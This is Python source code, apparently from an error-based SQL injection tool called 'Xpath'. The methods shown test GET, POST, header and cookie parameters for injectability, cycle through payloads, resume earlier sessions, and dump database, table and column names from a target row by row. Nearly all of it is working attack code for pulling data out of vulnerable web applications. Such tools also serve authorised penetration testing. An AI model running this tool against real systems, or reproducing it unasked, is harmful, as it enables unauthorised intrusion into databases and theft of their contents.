        db = to_hex(f"%{db}%")
        QUERY_COUNT = f"(SCHEMA_NAME LIKE {db})"
    if search_type == "table":
        table_to_generate = f"{tbl}_{search_type}"
        count_payloads = PAYLOADS_TABLE_SEARCH_COUNT
        dump_payloads = PAYLOADS_TABLE_SEARCH_DUMP
        if db and tbl:
            logger.info(
                f"searching tables LIKE '{tbl}' for database '{db}'")
            db = to_hex(db)
            tbl = to_hex(f"%{tbl}%")
            QUERY_COUNT = f"(TABLE_SCHEMA={db})AND(TABLE_NAME LIKE {tbl})"
        else:
            logger.info(f"searching tables LIKE '{tbl}'")
            tbl = to_hex(f"%{tbl}%")
            QUERY_COUNT = f"(TABLE_NAME LIKE {tbl})"
    if search_type == "column":
        table_to_generate = f"{col}_{search_type}"
        count_payloads = PAYLOADS_COLUMN_SEARCH_COUNT
        dump_payloads = PAYLOADS_COLUMN_SEARCH_DUMP
        if db and tbl and col:
            logger.info(
                f"searching columns LIKE '{col}' for table '{tbl}' in database '{db}'"
            )
            db = to_hex(db)
            tbl = to_hex(tbl)
            col = to_hex(f"%{col}%")
            QUERY_COUNT = f"(TABLE_SCHEMA={db})AND(TABLE_NAME={tbl})AND(COLUMN_NAME LIKE {col})"
        elif not db and tbl and col:
            logger.info(
                f"searching columns LIKE '{col}' for table '{tbl}' across all databases"
            )
            tbl = to_hex(tbl)
            col = to_hex(f"%{col}%")
            QUERY_COUNT = f"(TABLE_NAME={tbl})AND(COLUMN_NAME LIKE {col})"
        elif not tbl and db and col:
            logger.info(
                f"searching columns LIKE '{col}' in database '{db}'")
            db = to_hex(db)
            col = to_hex(f"%{col}%")
            QUERY_COUNT = f"(TABLE_SCHEMA={db})AND(COLUMN_NAME LIKE {col})"
        else:
            logger.info(
                f"searching columns LIKE '{col}' across all databases")
            col = to_hex(f"%{col}%")
            QUERY_COUNT = f"(COLUMN_NAME LIKE {col})"
    queries_count, queries_dump = [], []
    # the dump query pages one row at a time via LIMIT {OFFSET},1
    QUERY_DUMP += "%sLIMIT {OFFSET},1" % (QUERY_COUNT)
    for query in count_payloads:
        prepared_query = query.format(QUERY=QUERY_COUNT)
        queries_count.append(prepared_query)
    for query in dump_payloads:
        prepared_query = query.format(QUERY=QUERY_DUMP.format(OFFSET=0))
        queries_dump.append(prepared_query)
    for_count = self._generat_payload(payloads_list=queries_count)
    for_dump = self._generat_payload(payloads_list=queries_dump)
    return Payloads(for_count=for_count,
                    for_dump=for_dump,
                    table_to_generate=table_to_generate)
def is_injectable(
    self,
    url,
    data="",
    headers="",
    param="",
    injectable_param="",
    injection_type="",
):
    """Run the heuristic (basic) injectability test against one parameter.

    Sends a single request with a deliberately malformed payload injected
    into ``injectable_param`` and scans the response for DBMS error
    signatures via ``search_dbms_errors``.

    Returns a ``Response`` namedtuple (dbms, injectable); exits the whole
    program when the detected DBMS is neither MySQL nor PostgreSQL.
    """
    dbms = None
    injectable = False
    # quote/parenthesis soup meant to break out of any SQL context and
    # provoke a syntax error from the backend DBMS
    payload = ".,))').\".."
    Response = collections.namedtuple("Response", ["dbms", "injectable"])
    _temp = Response(dbms=dbms, injectable=injectable)

    def perform_request(url, data, headers, payload, param, injection_type, uec=0):
        # Inject `payload` into the right carrier (URL / POST body / headers)
        # and fire the request; `uec` tunes prepare_injection_payload's
        # encoding behavior on retries.
        resp = ""
        if url and not data and "GET" in injection_type or "URI" in injection_type:
            url = prepare_injection_payload(url, payload, param=param,
                                            unknown_error_counter=uec)
        if data and url and "POST" in injection_type:
            data = prepare_injection_payload(data, payload, param=param,
                                             unknown_error_counter=uec)
        if (headers and url and "HEADER" in injection_type
                or "COOKIE" in injection_type):
            headers = prepare_injection_payload(headers, payload, param=param,
                                                unknown_error_counter=uec)
        try:
            resp = request.perform(url, data=data, headers=headers,
                                   proxy=self._proxy)
        except Exception as error:
            logger.error(error)
            raise error
        return resp

    try:
        resp = perform_request(
            url=url,
            data=data,
            headers=headers,
            payload=payload,
            param=injectable_param,
            injection_type=injection_type.upper(),
        )
    except Exception as e:
        if "URL can't contain control characters" in str(e):
            # Retry with stronger payload encoding (uec=5).
            # BUGFIX: this previously called the undefined name
            # `fallback_request`, so the retry path raised NameError.
            try:
                resp = perform_request(
                    url=url,
                    data=data,
                    headers=headers,
                    payload=payload,
                    param=injectable_param,
                    injection_type=injection_type.upper(),
                    uec=5,
                )
            except Exception as error:
                raise error
        else:
            raise e
    # BUGFIX: parenthesized condition. The old form
    # `resp and resp.text or resp.error_msg` dereferenced `.error_msg`
    # on a falsy (empty-string) resp and raised AttributeError.
    if resp and (resp.text or resp.error_msg):
        out = search_dbms_errors(resp.text)
        injectable = out.get("vulnerable")
        param = f"{DIM}{white}'{param}'{BRIGHT}{black}"
        if injectable:
            _dbms = out.get("dbms")
            dbms = f"{DIM}{white}'{_dbms}'{BRIGHT}{black}"
            logger.notice(
                f"heuristic (basic) test shows that {injection_type} parameter {param} might be injectable (possible DBMS: {dbms})"
            )
            _temp = Response(dbms=_dbms, injectable=injectable)
            if _dbms.lower() not in ["mysql", "postgresql"]:
                # unsupported backend: bail out of the entire run
                logger.info(
                    f"Xpath currently does not support injection for '{_dbms}', will soon add support.."
                )
                logger.end("ending")
                sys.exit(0)
        if not injectable:
            logger.notice(
                f"heuristic (basic) test shows that {injection_type} parameter {param} might not be injectable"
            )
            _temp = Response(dbms="", injectable=injectable)
    return _temp
def perform(self):
    """Main detection driver: find an error-based injection point.

    Workflow:
      1. connection test (optionally adopting server-set cookies),
      2. resume previously found payloads from the session DB if present,
      3. otherwise iterate every candidate parameter x payload combination
         until one injects, honoring interactive skip/next/quit choices,
      4. report findings and return a ``Response`` namedtuple describing
         the best (highest-order) working payload.
    """
    vulns = []
    Response = collections.namedtuple(
        "Response",
        [
            "is_vulnerable",
            "dbms",
            "payloads",
            "filepath",
            "cookies",
            "headers",
            "injection_type",
            "injected_param",
            "session_filepath",
            "recommended_payload",
            "recommended_payload_type",
        ],
    )
    attemps_counter = 0  # [sic] total HTTP requests issued during detection
    session_data = []
    tested_payloads = []       # NOTE(review): currently unused
    successful_payloads = []   # NOTE(review): currently unused
    is_resumed = False
    filepath = None
    target_info = self._parse_target()
    set_cookie = ""
    set_headers = ""
    try:
        logger.notice("testing connection to the target URL.")
        resp = request.perform(
            self.url,
            data=self.data,
            headers=self.headers,
            use_requests=False,
            connection_test=True,
            proxy=self._proxy,
        )
        if "Set-Cookie" in list(resp.headers.keys()):
            # server wants to set cookies the user did not supply; offer
            # to adopt them for the rest of the run
            set_cookie = (", ".join(resp.headers.get_all("Set-Cookie"))
                          if hasattr(resp.headers, "get_all") else
                          resp.headers.get("Set-Cookie"))
            set_cookie = re.sub(r"(?is)path=/", "", set_cookie)
            _show_slice = set_cookie.rstrip()
            if len(set_cookie) > 20:
                # shorten long cookie values for the prompt
                _show_slice = f"{set_cookie[0:14]}....{set_cookie[-10:-2]}"
            question = logger.read_input(
                f"you have not declared cookie(s), while server wants to set its own ('{_show_slice}'). Do you want to use those [Y/n] ",
                batch=self._batch,
                user_input="Y",
            )
            if question in ["", "y"]:
                if "," in set_cookie:
                    set_cookie = "".join([
                        i.strip().replace("path=/", "").strip()
                        for i in set_cookie.split(",")
                    ])
                set_cookie = ";".join(set_cookie.split(";"))
                set_cookie = f"Cookie: {set_cookie}"
                # only append when the user did not already pass a cookie
                # NOTE(review): appends without a separator/newline — verify
                # downstream header parsing tolerates this
                if (not self.headers or
                        self.headers and "cookie" not in self.headers.lower()):
                    self.headers += set_cookie
    except Exception as error:
        logger.critical(
            "Xpath was not able to establish connection. try checking with -v set to 5."
        )
        logger.error(error)
        sys.exit(0)
    payloads_list = prepare_payloads(
        prefixes=PREFIX,
        suffixes=SUFFIX,
        payloads=PAYLOADS,
        techniques=self._techniques,
    )
    try:
        # resume earlier findings stored in the session database, if any
        table_name = "tbl_payload"
        session_data = session.fetch_from_table(
            session_filepath=self._session_filepath,
            table_name=table_name,
            cursor=False,
        )
        if session_data:
            is_resumed = True
            is_questioned = False
            for pay in session_data:
                vulns.append({
                    "injection_type": f"({pay.get('parameter')})",
                    "attempts": pay.get("payload_attemps"),
                    "payload": pay.get("payload"),
                    "title": pay.get("payload_type"),
                    "order": pay.get("payload_order"),
                    "regex": pay.get("regex"),
                    "injected_param": pay.get("param").replace("*", ""),
                    "dbms": pay.get("dbms"),
                })
    except Exception as error:
        # no session table yet — fresh run
        pass
    if not target_info.params:
        logger.critical(
            "no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')."
        )
        logger.end("ending")
        sys.exit(0)
    if not vulns:
        # ---- detection phase (no stored session results) ----
        params = target_info.params
        injection_type = target_info.injection_type
        is_custom_injection = target_info.is_custom_injection
        end_detection_phase = False
        is_injected = False
        successful_payload_prefix = ""
        vulnerable_param = ""
        unknown_error_counter = 0
        dbms = ""
        for entry in params:
            param = entry.get("key")
            param_value = entry.get("value")
            # with a custom marker ('*'), only test the marked parameter
            if is_custom_injection and not param_value.endswith("*"):
                continue
            sep = ": " if "header" in injection_type.lower() else "="
            injectable_param = (f"{param}{sep}{param_value}"
                                if param_value else f"{param}{sep}")
            resp = self.is_injectable(
                self.url,
                self.data,
                self.headers,
                param=param,
                injectable_param=injectable_param,
                injection_type=injection_type,
            )
            if not dbms:
                dbms = resp.dbms
            is_injectable = resp.injectable
            logger.info(
                f"testing for SQL injection on {injection_type} parameter '{param if not is_custom_injection else '#1*'}'"
            )
            next_param_test = False
            for entry in payloads_list:
                backend = entry.get("back_end")
                title = entry.get("title")
                # skip payload families for a different DBMS than detected
                if dbms and dbms.lower() != backend.lower():
                    logger.debug(f"Skipped '{title}'")
                    continue
                regex = entry.get("regex")
                order = entry.get("order")
                payloads = entry.get("payloads")
                logger.info(f"testing '{title}'")
                index = 0
                if successful_payload_prefix:
                    # a prefix already worked once; only try matching ones
                    payloads = [
                        pl for pl in payloads
                        if pl.prefix == successful_payload_prefix
                    ]
                while index < len(payloads):
                    url = self.url
                    data = self.data
                    headers = self.headers
                    obj = payloads[index]
                    payload = obj.string
                    prefix = obj.prefix
                    suffix = obj.suffix
                    logger.payload(payload)
                    it = self._injection_type.upper()
                    if "HEADER" in it or "COOKIE" in it:
                        headers = prepare_injection_payload(
                            text=self.headers,
                            payload=payload,
                            param=injectable_param,
                            unknown_error_counter=unknown_error_counter,
                        )
                    if "GET" in it:
                        url = prepare_injection_payload(
                            text=self.url,
                            payload=payload,
                            param=injectable_param,
                            unknown_error_counter=unknown_error_counter,
                        )
                    if "POST" in it:
                        data = prepare_injection_payload(
                            text=self.data,
                            payload=payload,
                            param=injectable_param,
                            unknown_error_counter=unknown_error_counter,
                        )
                    try:
                        if not is_injected:
                            attemps_counter += 1
                        response = request.inject_payload(
                            url=url,
                            regex=REGEX_TESTS,
                            data=data,
                            headers=headers,
                            use_requests=self._use_requests,
                            proxy=self._proxy,
                        )
                    except KeyboardInterrupt as e:
                        # Ctrl-C: ask how to proceed with the current test
                        question = logger.read_input(
                            "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit] "
                        )
                        if question and question == "e":
                            end_detection_phase = True
                            break
                        if question and question == "s":
                            break
                        if question and question == "n":
                            next_param_test = True
                            break
                        if question and question.lower() == "q":
                            logger.error("user quit")
                            logger.end("ending")
                            sys.exit(0)
                    except Exception as e:
                        # network hiccup etc. — count and keep going
                        unknown_error_counter += 1
                    else:
                        if response.ok:
                            # payload worked: persist and record the find
                            is_injected = True
                            successful_payload_prefix = prefix
                            _ = session.generate(
                                session_filepath=self._session_filepath)
                            with open(self._target_file, "w") as fd:
                                fd.write(
                                    f"{self.url} ({'GET' if 'cookie' in injection_type.lower() else injection_type}) # {' '.join(sys.argv)}"
                                )
                            if param:
                                message = f"{injection_type} parameter '{DIM}{white}{param}{BRIGHT}{black}' is '{DIM}{white}{title}{BRIGHT}{black}' injectable"
                            else:
                                message = f"{injection_type} parameter is '{DIM}{white}{title}{BRIGHT}{black}' injectable"
                            logger.notice(message)
                            vulns.append({
                                "injection_type": f"({injection_type})",
                                "attempts": attemps_counter,
                                "payload": payload,
                                "title": title,
                                "order": order,
                                "regex": regex,
                                "injected_param": injectable_param.replace("*", ""),
                                "dbms": dbms,
                            })
                            _ = session.dump(
                                session_filepath=self._session_filepath,
                                query=PAYLOAD_STATEMENT,
                                values=(
                                    str(title),
                                    order,
                                    attemps_counter,
                                    payload,
                                    injection_type,
                                    regex,
                                    "test",
                                    injectable_param,
                                    dbms,
                                ),
                            )
                            vulnerable_param = param
                            break
                    index += 1
                if end_detection_phase or next_param_test:
                    break
            if not is_injected:
                _param = f"{DIM}{white}'{param}'{BRIGHT}{black}"
                logger.notice(
                    f"{injection_type} parameter {_param} does not seem to be injectable"
                )
            if end_detection_phase:
                if not is_injected:
                    logger.critical(
                        "all tested parameters do not appear to be injectable"
                    )
                break
            if is_injected and not next_param_test:
                # offer to keep probing the remaining parameters
                if vulnerable_param:
                    message = f"{injection_type} parameter '{vulnerable_param}' is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
                else:
                    message = f"{injection_type} parameter is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
                question = logger.read_input(message,
                                             batch=self._batch,
                                             user_input="N")
                if question and question == "n":
                    break
    else:
        logger.debug(
            "skipping tests as we already have injected the target..")
    if vulns and isinstance(vulns, list):
        # ---- reporting phase: pick the highest-order working payload ----
        vulns = sorted(
            vulns,
            key=lambda k: k.get("order")
            if k.get("order") else k.get("payload_order"),
            reverse=True,
        )
        dbms = vulns[0].get("dbms")
        injection_type = vulns[0].get("injection_type")
        injected_param = vulns[0].get("injected_param")
        recommended_payload = vulns[0].get("payload")
        recommended_payload = clean_up_payload(
            payload=recommended_payload,
            replaceable_string="0x72306f746833783439")
        recommended_payload_type = vulns[0].get("regex")
        param = injected_param
        if not param and self.headers:
            # figure out which header carried the payload
            params = extract_params(self.headers,
                                    injection_type=injection_type)
            payload = prepare_injection_payload(self.headers,
                                                recommended_payload,
                                                param="").replace("%20", " ")
            param = ""
            for p in params:
                sep = ": " if "header" in injection_type.lower() else "="
                _param = f"{p.get('key')}{sep}{p.get('value').replace('*', '')}"
                _ = f"{_param}{recommended_payload}"
                if _ in payload.strip():
                    param = _param
                    break
        if not is_resumed:
            message = f"xpath identified the following injection point(s) with a total of {attemps_counter} HTTP(s) requests:"
        if is_resumed:
            message = "xpath resumed the following injection point(s) from stored session:"
        logger.success(message)
        if param:
            sep = ":" if "header" in injection_type.lower() else "="
            _param = param.split(sep)[0] if sep in param else param
            injection_type = f"{_param} {injection_type}"
        logger.success(f"---\nParameter: {injection_type}")
        text = " Type: error-based\n Title: {title}\n Payload: {_payload}"
        ok = []
        for v in vulns:
            title = v.get("title").strip()
            pl = v.get("payload").strip()
            # pad AND/OR-style payloads so they render with a leading space
            if pl[0].lower() in ["a", "o"]:
                pl = f" {pl}"
            if param and "HEADER" not in injection_type.upper():
                pl = f"{param}{pl}"
            ok.append(text.format(title=title, _payload=pl))
        logger.success("\n\n".join(ok))
        logger.success("---")
        resp = Response(
            is_vulnerable=True,
            payloads=vulns,
            dbms=dbms,
            filepath=self._filepath,
            cookies=set_cookie,
            headers=set_headers,
            injected_param=injected_param,
            injection_type=self._injection_type,
            session_filepath=self._session_filepath,
            recommended_payload=recommended_payload,
            recommended_payload_type=recommended_payload_type,
        )
    else:
        resp = Response(
            is_vulnerable=False,
            dbms=dbms,
            payloads=vulns,
            filepath=None,
            cookies=set_cookie,
            headers=set_headers,
            injected_param=None,
            session_filepath=None,
            injection_type=None,
            recommended_payload=None,
            recommended_payload_type=None,
        )
    return resp
def search(self, db="", tbl="", col="", search_type=""):
    """Search databases/tables/columns matching a LIKE pattern.

    Counts the matches first; on a hit, resumes any previously dumped
    results from the session DB and fetches the remaining rows.

    Returns a ``SearchResponse`` namedtuple (fetched, count, results).
    """
    index = 0
    _temp = []
    is_resumed = False
    fetched_data = {}
    SearchResponse = collections.namedtuple(
        "SearchResponse",
        ["fetched", "count", "results"],
    )
    if self._dbms and self._dbms == "PostgreSQL":
        # information_schema search payloads are MySQL-only for now
        logger.warning(f"Search is not implemeted yet for PostgreSQL..")
        return SearchResponse(fetched=False, count=0, results=[])
    payloads = self._search_payloads(db=db,
                                     tbl=tbl,
                                     col=col,
                                     search_type=search_type)
    self._table_search = payloads.table_to_generate
    try:
        # resume earlier results if the session table exists
        fetched_data = session.fetch_from_table(
            session_filepath=self.session_filepath,
            table_name=self._table_search,
            cursor=False,
        )
        if fetched_data:
            is_resumed = True
    except Exception as error:
        pass
    remainder = 0
    retval = self._extact(payloads=payloads.for_count)
    if retval.is_injected:
        found_records = int(retval.result)
        logger.info("used SQL query returns %d entries" % (found_records))
        if found_records == 0:
            # nothing matched — explain in terms of what was asked for
            if search_type == "database":
                logger.warning(f"no databases LIKE '{db}' found")
            if search_type == "table":
                if not db:
                    logger.warning(
                        f"no databases have tables LIKE '{tbl}'")
                if db:
                    logger.warning(
                        f"no tables LIKE '{tbl}' in database '{db}'")
                logger.warning(
                    f"no databases contain any of the provided tables")
            if search_type == "column":
                if not tbl and not db:
                    logger.warning(
                        f"no databases have tables containing columns LIKE '{col}'"
                    )
                if not tbl and db:
                    logger.warning(
                        f"no tables contain columns LIKE '{tbl}' in database '{db}'"
                    )
                if not db and tbl:
                    logger.warning(
                        f"no databases have tables containing columns LIKE '{col}' for table '{tbl}'"
                    )
                if db and tbl:
                    logger.warning(
                        f"unable to retrieve column names for table '{tbl}' in database '{db}'"
                    )
                logger.warning(
                    f"no databases have tables containing any of the provided columns"
                )
            return SearchResponse(fetched=False, count=0, results=[])
        if is_resumed:
            # replay entries stored in the session DB
            for entry in fetched_data:
                index = entry.get("index")
                name = entry.get("value")
                _type = entry.get("search_type")
                _temp.append(name)
                logger.info(f"resumed: {name}")
            # each logical record spans N stored rows depending on type
            if search_type == "column":
                remainder_value = 3
            if search_type == "table":
                remainder_value = 2
            if search_type == "database":
                remainder_value = 1
            remainder = len(fetched_data) % remainder_value
            fetched_records = _temp
            _temp = self._format_results(_temp, remainder_value)
            if remainder > 0:
                # last record was only partially dumped: redo it
                index -= 1
                fetched_records = fetched_records[-remainder:]
                _temp.pop()
            if remainder > 0:
                records = self._format_results(fetched_records,
                                               remainder_value)
            else:
                records = []
        should_fetch = True
        if is_resumed:
            if index == found_records:
                # everything already in the session DB
                should_fetch = False
        if should_fetch:
            retval = self._extact(payloads=payloads.for_dump)
            if retval.is_injected:
                payload = retval.payload
                payloads = self._generate_search_dump_payloads(
                    count=found_records, payload=payload, index=index)
                if not is_resumed:
                    session.generate_table(
                        session_filepath=self.session_filepath,
                        query=TBL_SEARCH.format(name=self._table_search),
                    )
                response_data = self._extract_search_results(
                    payloads=payloads,
                    database=db,
                    table=tbl,
                    search_type=search_type,
                    records=records,
                    position=index,
                )
                if response_data.is_fetched:
                    _temp.extend(response_data.result)
                self._pprint_search_results(search_type, _temp)
                return SearchResponse(fetched=True,
                                      count=found_records,
                                      results=_temp)
            if not retval.is_injected:
                status_code = retval.status_code
                error = retval.error
                count = retval.payloads_count
                if status_code not in [200, 0]:
                    message = f"{error} - {count} times"
                    logger.warning(
                        f"HTTP error codes detected during run:\n{message}"
                    )
                else:
                    message = f"tested with '{count}' queries, unable to find working SQL query."
                    logger.critical(message)
        else:
            # fully resumed — just print what we have
            self._pprint_search_results(search_type, _temp)
            return SearchResponse(fetched=True,
                                  count=found_records,
                                  results=_temp)
    if not retval.is_injected:
        status_code = retval.status_code
        error = retval.error
        count = retval.payloads_count
        if status_code not in [200, 0]:
            message = f"{error} - {count} times"
            logger.warning(
                f"HTTP error codes detected during run:\n{message}")
        else:
            message = (
                f"tested with '{count}' queries, unable to find working SQL query."
            )
            logger.critical(message)
    return SearchResponse(fetched=False, count=0, results=[])
def inject_payload(
    self,
    url,
    regex,
    data="",
    headers="",
    proxy=None,
    use_requests=False,
    timeout=30,
):
    """Send one injection request and pull the leaked value out of the body.

    Uses urllib (default) or requests depending on ``use_requests``; a
    non-empty ``data`` makes the request a POST. The response body is
    matched against ``regex`` (group 'xpath_data'), or decoded via the
    Cloudflare email-obfuscation decoder when protection is detected.

    Returns a ``Response`` namedtuple; ``ok`` is True when a result was
    extracted.
    """
    req = prepare_request(url=url,
                          data=data,
                          custom_headers=headers,
                          use_requests=use_requests)
    raw = req.raw
    custom_headers = req.headers
    logger.traffic_out(f"HTTP request:\n{raw}")
    text = ""
    result = ""
    error = ""
    status_code = 0
    response_url = ""
    reason = ""
    headers = {}
    Response = collections.namedtuple(
        "Response",
        [
            "ok", "url", "status_code", "text", "result", "headers",
            "reason", "error"
        ],
    )
    # pick the proxy mapping that matches the chosen transport
    if proxy and proxy.for_urllib and not use_requests:
        proxy = proxy.for_urllib
    elif proxy and proxy.for_requests and use_requests:
        proxy = proxy.for_requests
    else:
        proxy = None
    try:
        if not use_requests:
            opener = compat_opener()
            if proxy:
                opener = compat_opener(proxy)
            opener.addheaders = custom_headers
            if data:
                # urllib issues a POST whenever a body is supplied
                resp = opener.open(url, data.encode("utf-8"), timeout=timeout)
            else:
                resp = opener.open(url, timeout=timeout)
        else:
            if data:
                # BUGFIX: previously requests.get() was used even with a
                # POST body, so the data was sent on a GET request and the
                # injection never reached the server. Use POST like the
                # urllib path does.
                resp = requests.post(url,
                                     data=data,
                                     headers=custom_headers,
                                     proxies=proxy,
                                     timeout=timeout)
            else:
                resp = requests.get(url,
                                    headers=custom_headers,
                                    proxies=proxy,
                                    timeout=timeout)
            resp.raise_for_status()
    except (compat_httperr, requests.exceptions.HTTPError) as e:
        # HTTP error responses still carry a usable body
        error_resp = parse_http_error(e)
        text = error_resp.text
        headers = error_resp.headers
        status_code = error_resp.status_code
        error = error_resp.error
        reason = error_resp.reason
        response_url = error_resp.url
    except compat_urlerr as e:
        # connection-level failure: log and fall through with empty text
        logger.error(e)
    except KeyboardInterrupt as e:
        raise e
    else:
        http_response = parse_http_response(resp)
        headers = http_response.headers
        text = http_response.text
        status_code = http_response.status_code
        reason = http_response.reason
        response_url = http_response.url
    is_protected = detect_cloudflare_protection(text)
    if is_protected:
        result = cloudflare_decode(extract_encoded_data(text))
    else:
        result = search_regex(
            pattern=regex,
            string=text,
            default="",
            group="xpath_data",
        )
    # normalize the extracted value's encoding; BUGFIX: use a temp so a
    # failed decode can no longer leave `result` as bytes
    try:
        encoded = result.encode("utf-8")
        encoding = chardet.detect(encoded).get("encoding", "utf-8")
        result = encoded.decode(encoding)
    except Exception:
        pass
    _temp = Response(
        ok=bool(result),
        url=response_url,
        status_code=status_code,
        text="",  # text, we can add response html here
        result=result,
        error=error,
        reason=reason,
        headers=headers,
    )
    raw_response = prepare_response(_temp)
    logger.traffic_in(f"HTTP Response {raw_response}")
    return _temp
def tbl_names(self, db=""):
    """Enumerate table names for database ``db``.

    Counts the tables first, resumes already-dumped names from the session
    DB, then extracts the rest one row at a time.

    Returns a ``TablesResponse`` namedtuple (fetched, count, database,
    tables).
    """
    index = 0
    _temp = []
    is_resumed = False
    fetched_data = {}
    _temp_payloads = []
    TablesResponse = collections.namedtuple(
        "TablesResponse", ["fetched", "count", "database", "tables"])
    if db:
        dump_payloads = []
        # start from every known dialect's payloads as a fallback
        [dump_payloads.extend(v) for _, v in PAYLOADS_TBLS_NAMES.items()]
        encode_string = to_hex(db, dbms=self._dbms)
        if self._dbms:
            # narrow to the detected DBMS when known
            dump_payloads = PAYLOADS_TBLS_NAMES.get(
                self._dbms, dump_payloads)
        for entry in dump_payloads:
            if self._dbms and self._dbms.startswith("Microsoft"):
                # sysobjects queries take the raw name; others take hex
                if "sysobjects" in entry:
                    data = entry.format(db=db.strip(), db1=db.strip())
                else:
                    data = entry.format(db=encode_string,
                                        db1=encode_string)
            else:
                data = entry.format(db=encode_string)
            _temp_payloads.append(data)
    try:
        # resume table names already stored in the session DB
        fetched_data = session.fetch_from_table(
            session_filepath=self.session_filepath,
            table_name=db,
            cursor=False,
        )
        if fetched_data:
            is_resumed = True
    except Exception as error:
        pass
    logger.info("fetching tables for database: '%s'" % (db))
    retval = self._tbl_count(db=db)
    if retval.is_injected:
        tbl_count = int(retval.result)
        if tbl_count != 0:
            logger.info("used SQL query returns %d entries" % (tbl_count))
        if tbl_count == 0:
            logger.warning(
                "used SQL query returns %d entries for database: '%s'" %
                (tbl_count, db))
            return TablesResponse(fetched=False,
                                  count=tbl_count,
                                  database=db,
                                  tables=[])
        if is_resumed:
            for entry in fetched_data:
                name = entry.get("tblname")
                if name not in _temp:
                    _temp.append(name)
                    logger.info(f"resumed: '{name}'")
                index += 1
        should_fetch = True
        if is_resumed:
            if len(fetched_data) == tbl_count:
                # everything already dumped — nothing left to fetch
                should_fetch = False
        if should_fetch:
            payloads = self._generat_payload(payloads_list=_temp_payloads)
            retval = self._extact(payloads=payloads)
            if retval.is_injected:
                payload = retval.payload
                payloads = self._generate_tbl_payloads(tbl_count=tbl_count,
                                                       payload=payload,
                                                       index=index)
                if not is_resumed:
                    session.generate_table(
                        session_filepath=self.session_filepath,
                        query=DB_TABLES.format(name=db, tbl_name=db),
                    )
                response_data = self._extract_tbls(payloads=payloads,
                                                   database=db)
                if response_data.is_fetched:
                    _temp.extend(response_data.result)
                self._pprint_tables(
                    cursor_or_list=_temp,
                    field_names="Tables",
                    database=db,
                )
                return TablesResponse(fetched=True,
                                      count=tbl_count,
                                      database=db,
                                      tables=_temp)
            if not retval.is_injected:
                status_code = retval.status_code
                error = retval.error
                count = retval.payloads_count
                if status_code not in [200, 0]:
                    message = f"{error} - {count} times"
                    logger.warning(
                        f"HTTP error codes detected during run:\n{message}"
                    )
                else:
                    message = f"tested with '{count}' queries, unable to find working SQL query."
                    logger.critical(message)
        else:
            # fully resumed — just print what we have
            self._pprint_tables(
                cursor_or_list=_temp,
                field_names="Tables",
                database=db,
            )
            return TablesResponse(fetched=True,
                                  count=tbl_count,
                                  database=db,
                                  tables=_temp)
    if not retval.is_injected:
        status_code = retval.status_code
        error = retval.error
        count = retval.payloads_count
        if status_code not in [200, 0]:
            message = f"{error} - {count} times"
            logger.warning(
                f"HTTP error codes detected during run:\n{message}")
        else:
            message = (
                f"tested with '{count}' queries, unable to find working SQL query."
            )
            logger.critical(message)
    return TablesResponse(fetched=False, count=0, database="", tables=_temp)
def _parse_target(self):
    """Extract the candidate parameters to test from the configured target.

    Depending on the configured injection type, parameters are pulled from
    the headers, the POST body, or the URL query string. A '*' marker in
    any of those sources lets the user opt into custom-injection mode
    (prompted interactively, auto-'Y' in batch mode).

    Returns a ``ParamResponse`` namedtuple (params, injection_type,
    is_custom_injection).
    """
    ParamResponse = collections.namedtuple(
        "ParamResponse",
        ["params", "injection_type", "is_custom_injection"])
    found_params = []
    effective_type = self._injection_type
    custom_marker = False

    def confirmed(prompt):
        # Ask about a found '*' marker; 'q' aborts the run, ''/'y' accepts.
        answer = logger.read_input(prompt, batch=self._batch, user_input="Y")
        if answer == "q":
            logger.error("user quit.")
            logger.end("ending")
            sys.exit(0)
        return answer in ("", "y")

    if (self.headers and self.url and "COOKIE" in effective_type.upper()
            or "HEADER" in effective_type.upper()):
        found_params = extract_params(value=self.headers,
                                      injection_type=effective_type)
        if "*" in self.headers and confirmed(
                "custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] "
        ):
            custom_marker = True
            effective_type = f"(custom) {effective_type}"
    if self.data and self.url and "POST" in effective_type.upper():
        found_params = extract_params(value=self.data,
                                      injection_type=effective_type)
        if "*" in self.data and confirmed(
                "custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] "
        ):
            custom_marker = True
            effective_type = "(custom) POST"
    if self.url and not self.data and "GET" in effective_type.upper():
        found_params = extract_params(value=self.url,
                                      injection_type=effective_type)
        if "*" in self.url and confirmed(
                "custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] "
        ):
            custom_marker = True
            effective_type = "URI"
    if found_params:
        return ParamResponse(params=found_params,
                             injection_type=effective_type,
                             is_custom_injection=custom_marker)
    # nothing extracted: report the original type with no custom marker
    return ParamResponse(params=[],
                         injection_type=self._injection_type,
                         is_custom_injection=False)